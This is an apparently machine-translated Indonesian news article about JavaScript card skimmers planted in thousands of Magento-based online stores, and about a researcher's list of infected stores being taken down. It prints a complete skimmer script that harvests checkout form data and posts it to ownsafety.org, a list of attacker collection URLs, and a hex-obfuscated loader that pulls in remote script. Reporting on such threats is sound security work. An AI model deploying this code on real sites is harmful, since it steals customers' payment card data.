Geekly articles weekly

Github telah menghapus daftar 5.925 toko online dengan skimmers JS yang diinstal



Skimming online adalah bentuk penipuan kartu kredit yang relatif baru. Esensinya jelas dari namanya. Jika skimmer biasa adalah overlay pada pembaca kartu ATM yang membuang strip magnetik, maka skimmer online adalah bookmark perangkat lunak pada server toko online yang secara pasif memotong data pembayaran saat dimasukkan oleh pengguna ke bidang teks dalam browser. Hingga saat ini, carder berkonsentrasi terutama pada server transaksi tempat enkripsi digunakan, tetapi dalam hal ini informasi tersebut dihapus bahkan sebelum enkripsi. Kemudian, informasi tentang kartu pembayaran dijual di forum rahasia: biasanya orang luar dapat melakukan pembayaran menggunakan kartu-kartu ini.

Spesialis Keamanan di Nightly Secure mengatakanbahwa skimming online semakin populer akhir-akhir ini. Untuk pertama kalinya, penyebaran penipuan tersebut dibahas pada tahun 2015 . Pada November 2015, dari daftar 255.000 toko online, 3.501 toko dengan bookmark JS di server ditemukan. Sepanjang tahun, jumlah mereka meningkat 69%.

Contoh bookmark javascript untuk memotong data pembayaran terlihat seperti ini (dalam hal ini, informasi dikirim ke http://ownsafety.org/opp.php):

<script>// <![CDATA[
// whitespace added for readability --wdg
    function j(e) {
        var t = "; " + document.cookie,
            o = t.split("; " + e + "=");
        return 2 == o.length ? o.pop().split(";").shift() : void 0
    }
    j("SESSIID") || (document.cookie = "SESSIID=" + (new Date).getTime()), jQuery(function(e) {
        e("button").on("click", function() {
            var t = "",
                o = "post",
                n = window.location;
            if (new RegExp("onepage|checkout").test(n)) {
                for (var c = document.querySelectorAll("input, select, textarea, checkbox"), i = 0; i < c.length; i++) if (c[i].value.length > 0) {
                        var a = c[i].name;
                        "" == a && (a = i), t += a + "=" + c[i].value + "&"
                    }
                if (t) {
                    var l = new RegExp("[0-9]{13,16}"),
                        u = new XMLHttpRequest;
                    u.open(o, e("
 
<div />").html("http://ownsafety.org/opp.php").text(), !0), u.setRequestHeader("Content-type", "application/x-www-form-urlencoded"), u.send(t + "&asd=" + (l.test(t.replace(/s/g, "")) ? 1 : 0) + "&utmp=" + n + "&cookie=" + j("SESSIID")), console.clear()
                }
            }
        })
    });
// ]]></script>

Tahun lalu, para peneliti menyusun daftar alamat yang biasa digunakan untuk pengumpulan data:

1860 https://ownsafety.org/opp.php
 390 http://ownsafety.org/opp.php
 309 https://useagleslogistics.com/gates/jquery.php
 100 https://redwiggler.org/wp-content/themes/jquerys.php
  70 https://clickvisits.biz/xrc.php
  28 https://gamula.eu/jquery.php
  23 https://gamula.ru/order.php
  22 https://news-daily.me/gt/
  20 https://antaras.xyz/jquery.php
  17 https://clicksale.xyz/xrc.php
  10 https://ausfunken.com/service/css.php
   9 http://www.dobell.com/var/extendware/system/licenses/encoder/mage_ajax.php
   5 https://redwiggler.org/wp-content/themes/jquery.php
   1 /js/index.php
   1 /js/am/extensions/sitemap_api.php 
   1 https://infopromo.biz/lib/jquery.php
   1 https://google-adwords-website.biz/gates/jquery.php
   1 https://bandagesplus.com/order.php
   1 http://nearart.com/order.php
   1 http://happysocks.in/jquery.pl

Di hampir semua kasus, versi kecil dari kode yang sama digunakan.

Bookmark ini cukup sulit dideteksi di server. Kode ini diunduh dari CMS dan berfungsi di browser. Tahun lalu, dia bekerja di tiga setengah ribu situs yang disebutkan selama beberapa bulan, pada banyak - enam bulan atau lebih.

Para ahli percaya bahwa sejumlah besar server yang terinfeksi mengindikasikan otomatisasi serangan tingkat tinggi. Tidak beberapa script kiddies melakukan ini, tetapi profesional yang baik Mungkin dari Rusia.

Untuk menerapkan bookmark, kerentanan dalam perangkat lunak toko online digunakan. Pertama-tama, ini adalah perangkat lunak Magento Commerce yang rentan. Melalui kode inilah yang paling mudah untuk menerapkan kode CMS, meskipun sebenarnya kode ini dapat bekerja di toko online mana pun yang tidak perlu menggunakan Magento. Periksa toko online untuk mengetahui kerentanan di situs MageReports.com .

Meskipun masalah telah diangkat setahun yang lalu, selama setahun terakhir ini belum hilang. Lebih buruk lagi, toko online yang terinfeksi telah menjadi satu setengah kali lebih banyak. Pada Maret 2016, jumlah toko dengan skimmers meningkat dari 3501 menjadi 4476, dan pada September 2016 menjadi 5.925.

Orang-orang dari Nightly Secure menerbitkan daftar semua toko yang terinfeksi untuk memperingatkan pelanggan - dan memberi tahu administrator toko ini tentang kerentanan. Memang, di antara mereka ada situs yang cukup populer, termasuk departemen produsen mobil (Audi ZA), organisasi pemerintah (NRSC, Malaysia), situs musisi populer (BjΓΆrk), dan organisasi nirlaba (Museum Sains, Katedral Washington).

Jika setahun yang lalu di hampir semua toko modifikasi kecil dari skimmer online yang sama digunakan, sekarang para peneliti telah menemukan 9 varietas terpisah dari skrip milik 3 keluarga yang berbeda ( kode sampel pada Github ).

Penyerang menjadi lebih pintar dan sekarang menggunakan kebingungan kode multi-level, yang tidak mudah diurai. Misalnya, skrip dapat disembunyikan seperti ini:



Kode malware asli:

<script language="javascript">window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72'+'\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x69\x70\x2e\x35\x75\x75\x38\x2e\x63\x6f\x6d\x2f\x69\x70\x2f\x69\x70\x5f'+'\x34\x30\x37\x39\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72'+'\x69\x70\x74\x3e');//4079</script>

Para penulis juga meningkatkan mekanisme untuk mencegat data kartu pembayaran. Jika sebelumnya malware hanya memotong halaman dengan string checkoutdi URL, sekarang sudah mengenali plug-in pembayaran populer Firecheckout, Onestepcheckout dan Paypal.

Spesialis dari Nightly Secure mencoba menghubungi sejumlah toko (sekitar 30) dan memberi tahu mereka tentang skimmer yang dipasang, tetapi mereka tidak menerima respons dari sebagian besar toko, sementara yang lain menunjukkan ketidakseimbangan yang mengejutkan. Salah satu mengatakan bahwa ini bukan masalahnya, karena pembayaran diproses oleh perusahaan pihak ketiga. Yang kedua mengatakan itu hanya kesalahan Javascript yang bukan ancaman. Yang ketiga mengatakan bahwa tidak ada bahaya, karena "toko beroperasi pada HTTPS." Penulis mengirimkan daftar toko skimmer ke Google untuk daftar hitam Penjelajahan Aman Chrome.

Daftar semua toko skimmer pada awalnya diterbitkan di Github . Dan di sini kesenangan dimulai. Segera github tanpa peringatandihapus dari situsnya publikasi hasil penelitian dari toko online .

Rupanya, Github disensor sesuai dengan prosedur standar, setelah menerima permintaan DMCA dari salah satu toko. Tentu saja, toko itu tidak menyenangkan ketika mereka menemukan kerentanan dan memberi tahu seluruh dunia.

Kemarin, penulis mentransfer hasil studi keamanan toko online ke hosting Gitlab . Hari ini, halaman di alamat ini mengembalikan kesalahan 404. Beberapa jam yang lalu, penulis menerima email dari Gitlab yang menjelaskan alasan penghapusan. Menurut administrasi, publikasi daftar toko yang rentan dipandang sebagai "kasus mengerikan" yang tidak dapat diselesaikan. Oleh karena itu, daftar telah dihapus (UPD: akses dikembalikan, Direktur Gitlab meminta maaf).

Salin daftar di arsip web
Salin ke Pastebin.

Perhatikan bahwa daftar toko dengan skimmer online yang diinstal mencantumkan 44 domain di zona .RU.

Mudah-mudahan, administrator toko-toko ini akan segera menginstal versi Magento dengan tambalan terbaru dan mengkompensasi kerugian kepada pelanggan yang memiliki salinan kartu pembayaran yang bocor ke pasar gelap.

Source: https://habr.com/ru/post/id398279/

More articles:


All Articles